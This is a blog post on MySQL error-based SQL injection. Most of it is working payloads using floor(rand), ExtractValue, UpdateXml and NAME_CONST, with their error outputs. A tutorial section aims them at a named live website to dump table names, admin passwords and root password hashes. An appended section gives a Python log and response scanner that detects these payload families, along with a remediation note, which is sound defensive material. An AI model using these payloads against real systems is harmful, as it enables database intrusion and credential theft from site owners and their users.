MySQL error-based injection: three techniques using floor, ExtractValue and UpdateXml

Posted on 2015-11-11 19:03:37

1. Triggering errors with floor()

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

Example:
First, run a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version is disclosed in the error message. To retrieve other data, replace version() in the statement with a different subquery. For example, to retrieve the administrator's username and password:

Method 1:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id=1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2. ExtractValue

Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'


Further collected material:

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

Error-based injection on newer MySQL versions: injection with NAME_CONST

It's been a while since I've made an SQL Injection tutorial, so I thought I should make a new tutorial using the method name_const. There aren't many papers documenting this method, so it feels kind of good to be the one to make a guide for it.

Background

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)

+------+
| TEST |
+------+
|    1 |
+------+

http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = Your MySQL variable.

MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'

Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, it just wouldn't work there. Luckily, they work here so let's get this going again...

Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column 1 error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1'

Now let's get the tables out this bitch..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here; if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage'

Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'

Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

And there we have it, thanks for reading.
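
From the defender's side, the common thread in the floor(), ExtractValue, UpdateXml and NAME_CONST techniques above is a verbose MySQL error reaching the client. The following Python is an added example, not part of the original post or the quoted tutorial: it flags the payload families in the query strings of access-log lines and the leaked error strings in response bodies. The log lines and the /content/detail.php path are constructed samples.

```python
import re
from urllib.parse import unquote_plus

# Payload families from the post; every regex in a family's tuple must match the decoded, lower-cased query.
PAYLOAD_SIGNATURES = {
    # count(*) + concat(..., floor(rand(0)*2)) + GROUP BY -> ERROR 1062 Duplicate entry
    "floor_rand_groupby": (re.compile(r"floor\s*\(\s*rand\s*\("), re.compile(r"group\s+by")),
    # extractvalue()/updatexml() given an invalid XPath -> ERROR 1105 XPATH syntax error
    "extractvalue": (re.compile(r"\bextractvalue\s*\("),),
    "updatexml": (re.compile(r"\bupdatexml\s*\("),),
    # two same-named name_const() columns in one derived table -> Duplicate column name
    "name_const_dup": (re.compile(r"\bname_const\s*\(.*\bname_const\s*\(", re.S),),
}
# Verbose MySQL errors echoed to the client: the leak that makes every technique above work.
LEAK_SIGNATURES = {
    "duplicate_entry": re.compile(r"Duplicate entry .* for key"),
    "xpath_error": re.compile(r"XPATH syntax error"),
    "duplicate_column": re.compile(r"Duplicate column name"),
}
# Request path and status code from a combined-format access log line.
LOG_LINE = re.compile(r'"(?:GET|POST) (?P<path>\S+) HTTP/1\.[01]" (?P<status>\d{3})')
# Constructed sample log: one benign request, then three error-based probes answered with 500.
SAMPLE_LOG = """\
203.0.113.5 - - [11/Nov/2015:19:03:37 +0800] "GET /content/detail.php?id=330&sid=19&cid=261 HTTP/1.1" 200 5120
203.0.113.5 - - [11/Nov/2015:19:03:41 +0800] "GET /content/detail.php?id=330+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)-- HTTP/1.1" 500 812
203.0.113.5 - - [11/Nov/2015:19:03:45 +0800] "GET /content/detail.php?id=1%20and%20extractvalue(1,concat(0x5c,(select%20user())))-- HTTP/1.1" 500 790
203.0.113.5 - - [11/Nov/2015:19:03:52 +0800] "GET /content/detail.php?id=1%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 500 830
"""

def classify_request(query_string: str) -> list[str]:
    """Return the payload families present in a raw (still URL-encoded) query string."""
    text = unquote_plus(query_string).lower()
    return [name for name, pats in PAYLOAD_SIGNATURES.items() if all(p.search(text) for p in pats)]

def classify_response(body: str) -> list[str]:
    """Return which verbose MySQL error messages leaked into a response body."""
    return [name for name, pat in LEAK_SIGNATURES.items() if pat.search(body)]

def scan_access_log(lines) -> list[tuple[int, list[str]]]:
    """Return (status, families) for every request whose query string matches a family."""
    hits = []
    for line in lines:
        m = LOG_LINE.search(line)
        if not m or "?" not in m["path"]:
            continue
        families = classify_request(m["path"].split("?", 1)[1])
        if families:  # a 500 paired with a signature hit is the strongest indicator
            hits.append((int(m["status"]), families))
    return hits
```

The durable fix is parameterised queries plus suppressing database error text in responses; the response check above is how you confirm that suppression is actually in place.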
